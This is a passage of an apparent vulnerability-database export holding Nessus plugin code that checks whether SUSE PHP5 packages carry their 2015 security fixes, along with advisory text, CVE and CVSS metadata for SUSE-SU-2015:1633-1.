rpm_check(release:\"SUSE13.1\", reference:\"php5-mbstring-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mcrypt-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mcrypt-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mssql-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mssql-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mysql-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-mysql-debuginfo-5.4.20-67.1\") ) flag++;\nif 
( rpm_check(release:\"SUSE13.1\", reference:\"php5-odbc-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-odbc-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-openssl-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-openssl-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pcntl-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pcntl-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pdo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pdo-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pear-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pgsql-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pgsql-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-phar-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-phar-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-posix-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-posix-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pspell-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-pspell-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-readline-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-readline-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-shmop-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-shmop-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-snmp-5.4.20-67.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE13.1\", reference:\"php5-snmp-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-soap-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-soap-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sockets-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sockets-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sqlite-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sqlite-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-suhosin-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-suhosin-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sysvmsg-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sysvmsg-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sysvsem-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sysvsem-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sysvshm-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sysvshm-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-tidy-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-tidy-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-tokenizer-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-tokenizer-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-wddx-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-wddx-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", 
reference:\"php5-xmlreader-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xmlreader-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xmlrpc-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xmlrpc-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xmlwriter-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xmlwriter-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xsl-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xsl-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-zip-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-zip-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-zlib-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-zlib-debuginfo-5.4.20-67.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"apache2-mod_php5-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"apache2-mod_php5-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-bcmath-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-bcmath-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-bz2-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-bz2-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-calendar-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-calendar-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ctype-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", 
reference:\"php5-ctype-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-curl-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-curl-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-dba-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-dba-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-debugsource-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-devel-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-dom-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-dom-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-enchant-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-enchant-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-exif-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-exif-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fastcgi-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fastcgi-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fileinfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fileinfo-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-firebird-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-firebird-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fpm-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fpm-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", 
reference:\"php5-ftp-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ftp-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gd-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gd-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gettext-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gettext-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gmp-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gmp-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-iconv-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-iconv-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-imap-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-imap-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-intl-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-intl-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-json-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-json-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ldap-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ldap-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mbstring-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mbstring-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mcrypt-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mcrypt-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", 
reference:\"php5-mssql-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mssql-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mysql-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mysql-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-odbc-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-odbc-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-opcache-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-opcache-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-openssl-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-openssl-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pcntl-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pcntl-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pdo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pdo-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pear-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pgsql-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pgsql-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-phar-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-phar-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-posix-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-posix-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pspell-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", 
reference:\"php5-pspell-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-readline-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-readline-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-shmop-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-shmop-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-snmp-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-snmp-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-soap-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-soap-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sockets-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sockets-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sqlite-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sqlite-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-suhosin-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-suhosin-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvmsg-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvmsg-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvsem-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvsem-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvshm-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvshm-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-tidy-5.6.1-36.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE13.2\", reference:\"php5-tidy-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-tokenizer-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-tokenizer-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-wddx-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-wddx-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlreader-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlreader-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlrpc-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlrpc-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlwriter-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlwriter-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xsl-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xsl-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-zip-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-zip-debuginfo-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-zlib-5.6.1-36.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-zlib-debuginfo-5.6.1-36.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-mod_php5 / apache2-mod_php5-debuginfo / php5 / php5-bcmath / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-25T17:19:33", 
"description": "This update of PHP5 brings several security fixes.\n\nSecurity fixes :\n\n - CVE-2015-6831: A use-after-free vulnerability in unserialize(), which could be used to crash PHP or potentially execute code, has been fixed. [bnc#942291] [bnc#942294] [bnc#942295]\n\n - CVE-2015-6832: A dangling pointer in the unserialization of ArrayObject items could be used to crash PHP or potentially execute code. [bnc#942293]\n\n - CVE-2015-6833: A directory traversal when extracting ZIP files could be used to overwrite files outside of the intended area. [bnc#942296]\n\n - CVE-2015-6834: A use-after-free vulnerability in unserialize(), which could be used to crash PHP or potentially execute code, has been fixed. [bnc#945403]\n\n - CVE-2015-6835: A use-after-free vulnerability in session unserialize(), which could be used to crash PHP or potentially execute code, has been fixed. [bnc#945402]\n\n - CVE-2015-6836: A type confusion in SOAP serialize_function_call(), leading to remote code execution, was fixed. [bnc#945428]\n\n - CVE-2015-6837 CVE-2015-6838: Two NULL pointer dereferences in the XSLTProcessor class were fixed.\n [bnc#945412]\n\nBugfixes :\n\n - Compare with SQL_NULL_DATA correctly [bnc#935074]\n\n - If MD5 is disabled in net-snmp, the MD5 function used in ext/snmp/snmp.c has to be disabled as well.\n (bsc#944302)\n\nAlso the Suhosin framework was updated to 0.9.38. [fate#319325]\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-01-02T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : php5 (SUSE-SU-2015:1633-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6831", "CVE-2015-6832", "CVE-2015-6833", "CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2022-05-24T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:apache2-mod_php5", "p-cpe:/a:novell:suse_linux:apache2-mod_php5-debuginfo", "p-cpe:/a:novell:suse_linux:php5", "p-cpe:/a:novell:suse_linux:php5-bcmath", "p-cpe:/a:novell:suse_linux:php5-bcmath-debuginfo", "p-cpe:/a:novell:suse_linux:php5-bz2", "p-cpe:/a:novell:suse_linux:php5-bz2-debuginfo", "p-cpe:/a:novell:suse_linux:php5-calendar", "p-cpe:/a:novell:suse_linux:php5-calendar-debuginfo", "p-cpe:/a:novell:suse_linux:php5-ctype", "p-cpe:/a:novell:suse_linux:php5-ctype-debuginfo", "p-cpe:/a:novell:suse_linux:php5-curl", "p-cpe:/a:novell:suse_linux:php5-curl-debuginfo", "p-cpe:/a:novell:suse_linux:php5-dba", "p-cpe:/a:novell:suse_linux:php5-dba-debuginfo", "p-cpe:/a:novell:suse_linux:php5-debuginfo", "p-cpe:/a:novell:suse_linux:php5-debugsource", "p-cpe:/a:novell:suse_linux:php5-dom", "p-cpe:/a:novell:suse_linux:php5-dom-debuginfo", "p-cpe:/a:novell:suse_linux:php5-enchant", "p-cpe:/a:novell:suse_linux:php5-enchant-debuginfo", "p-cpe:/a:novell:suse_linux:php5-exif", "p-cpe:/a:novell:suse_linux:php5-exif-debuginfo", "p-cpe:/a:novell:suse_linux:php5-fastcgi", "p-cpe:/a:novell:suse_linux:php5-fastcgi-debuginfo", "p-cpe:/a:novell:suse_linux:php5-fileinfo", "p-cpe:/a:novell:suse_linux:php5-fileinfo-debuginfo", "p-cpe:/a:novell:suse_linux:php5-fpm", "p-cpe:/a:novell:suse_linux:php5-fpm-debuginfo", "p-cpe:/a:novell:suse_linux:php5-ftp", "p-cpe:/a:novell:suse_linux:php5-ftp-debuginfo", 
"p-cpe:/a:novell:suse_linux:php5-gd", "p-cpe:/a:novell:suse_linux:php5-gd-debuginfo", "p-cpe:/a:novell:suse_linux:php5-gettext", "p-cpe:/a:novell:suse_linux:php5-gettext-debuginfo", "p-cpe:/a:novell:suse_linux:php5-gmp", "p-cpe:/a:novell:suse_linux:php5-gmp-debuginfo", "p-cpe:/a:novell:suse_linux:php5-iconv", "p-cpe:/a:novell:suse_linux:php5-iconv-debuginfo", "p-cpe:/a:novell:suse_linux:php5-intl", "p-cpe:/a:novell:suse_linux:php5-intl-debuginfo", "p-cpe:/a:novell:suse_linux:php5-json", "p-cpe:/a:novell:suse_linux:php5-json-debuginfo", "p-cpe:/a:novell:suse_linux:php5-ldap", "p-cpe:/a:novell:suse_linux:php5-ldap-debuginfo", "p-cpe:/a:novell:suse_linux:php5-mbstring", "p-cpe:/a:novell:suse_linux:php5-mbstring-debuginfo", "p-cpe:/a:novell:suse_linux:php5-mcrypt", "p-cpe:/a:novell:suse_linux:php5-mcrypt-debuginfo", "p-cpe:/a:novell:suse_linux:php5-mysql", "p-cpe:/a:novell:suse_linux:php5-mysql-debuginfo", "p-cpe:/a:novell:suse_linux:php5-odbc", "p-cpe:/a:novell:suse_linux:php5-odbc-debuginfo", "p-cpe:/a:novell:suse_linux:php5-opcache", "p-cpe:/a:novell:suse_linux:php5-opcache-debuginfo", "p-cpe:/a:novell:suse_linux:php5-openssl", "p-cpe:/a:novell:suse_linux:php5-openssl-debuginfo", "p-cpe:/a:novell:suse_linux:php5-pcntl", "p-cpe:/a:novell:suse_linux:php5-pcntl-debuginfo", "p-cpe:/a:novell:suse_linux:php5-pdo", "p-cpe:/a:novell:suse_linux:php5-pdo-debuginfo", "p-cpe:/a:novell:suse_linux:php5-pgsql", "p-cpe:/a:novell:suse_linux:php5-pgsql-debuginfo", "p-cpe:/a:novell:suse_linux:php5-posix", "p-cpe:/a:novell:suse_linux:php5-posix-debuginfo", "p-cpe:/a:novell:suse_linux:php5-pspell", "p-cpe:/a:novell:suse_linux:php5-pspell-debuginfo", "p-cpe:/a:novell:suse_linux:php5-shmop", "p-cpe:/a:novell:suse_linux:php5-shmop-debuginfo", "p-cpe:/a:novell:suse_linux:php5-snmp", "p-cpe:/a:novell:suse_linux:php5-snmp-debuginfo", "p-cpe:/a:novell:suse_linux:php5-soap", "p-cpe:/a:novell:suse_linux:php5-soap-debuginfo", "p-cpe:/a:novell:suse_linux:php5-sockets", 
"p-cpe:/a:novell:suse_linux:php5-sockets-debuginfo", "p-cpe:/a:novell:suse_linux:php5-sqlite", "p-cpe:/a:novell:suse_linux:php5-sqlite-debuginfo", "p-cpe:/a:novell:suse_linux:php5-suhosin", "p-cpe:/a:novell:suse_linux:php5-suhosin-debuginfo", "p-cpe:/a:novell:suse_linux:php5-sysvmsg", "p-cpe:/a:novell:suse_linux:php5-sysvmsg-debuginfo", "p-cpe:/a:novell:suse_linux:php5-sysvsem", "p-cpe:/a:novell:suse_linux:php5-sysvsem-debuginfo", "p-cpe:/a:novell:suse_linux:php5-sysvshm", "p-cpe:/a:novell:suse_linux:php5-sysvshm-debuginfo", "p-cpe:/a:novell:suse_linux:php5-tokenizer", "p-cpe:/a:novell:suse_linux:php5-tokenizer-debuginfo", "p-cpe:/a:novell:suse_linux:php5-wddx", "p-cpe:/a:novell:suse_linux:php5-wddx-debuginfo", "p-cpe:/a:novell:suse_linux:php5-xmlreader", "p-cpe:/a:novell:suse_linux:php5-xmlreader-debuginfo", "p-cpe:/a:novell:suse_linux:php5-xmlrpc", "p-cpe:/a:novell:suse_linux:php5-xmlrpc-debuginfo", "p-cpe:/a:novell:suse_linux:php5-xmlwriter", "p-cpe:/a:novell:suse_linux:php5-xmlwriter-debuginfo", "p-cpe:/a:novell:suse_linux:php5-xsl", "p-cpe:/a:novell:suse_linux:php5-xsl-debuginfo", "p-cpe:/a:novell:suse_linux:php5-zip", "p-cpe:/a:novell:suse_linux:php5-zip-debuginfo", "p-cpe:/a:novell:suse_linux:php5-zlib", "p-cpe:/a:novell:suse_linux:php5-zlib-debuginfo", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2015-1633-1.NASL", "href": "https://www.tenable.com/plugins/nessus/119971", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:1633-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(119971);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/24\");\n\n script_cve_id(\n \"CVE-2015-6831\",\n \"CVE-2015-6832\",\n \"CVE-2015-6833\",\n \"CVE-2015-6834\",\n 
\"CVE-2015-6835\",\n \"CVE-2015-6836\",\n \"CVE-2015-6837\",\n \"CVE-2015-6838\"\n );\n\n script_name(english:\"SUSE SLES12 Security Update : php5 (SUSE-SU-2015:1633-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update of PHP5 brings several security fixes.\n\nSecurity fixes :\n\n - CVE-2015-6831: A use after free vulnerability in\n unserialize() has been fixed which could be used to\n crash php or potentially execute code. [bnc#942291]\n [bnc#942294] [bnc#942295]\n\n - CVE-2015-6832: A dangling pointer in the unserialization\n of ArrayObject items could be used to crash php or\n potentially execute code. [bnc#942293]\n\n - CVE-2015-6833: A directory traversal when extracting ZIP\n files could be used to overwrite files outside of\n intended area. [bnc#942296]\n\n - CVE-2015-6834: A Use After Free Vulnerability in\n unserialize() has been 